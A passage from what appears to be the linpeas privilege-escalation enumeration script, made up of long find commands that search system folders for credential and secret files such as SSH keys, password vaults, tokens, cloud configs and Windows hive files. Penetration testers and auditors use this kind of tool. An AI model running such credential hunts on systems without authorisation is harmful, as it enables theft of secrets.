\"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    771   FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"ssh*config\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    772   FIND_LIB=`eval_bckgrd "find ${ROOT_FOLDER}lib -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"log4j-core*.jar\" -o -name \"rocketchat.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    773   FIND_LIB32=`eval_bckgrd "find ${ROOT_FOLDER}lib32 -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    774   FIND_LIB64=`eval_bckgrd "find ${ROOT_FOLDER}lib64 -name \"*.timer\" -o -name \"log4j-core*.jar\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    775   FIND_MEDIA=`eval_bckgrd "find ${ROOT_FOLDER}media -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    776   FIND_MNT=`eval_bckgrd "find ${ROOT_FOLDER}mnt -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"sess_*\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
    777   FIND_OPT=`eval_bckgrd "find ${ROOT_FOLDER}opt -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name 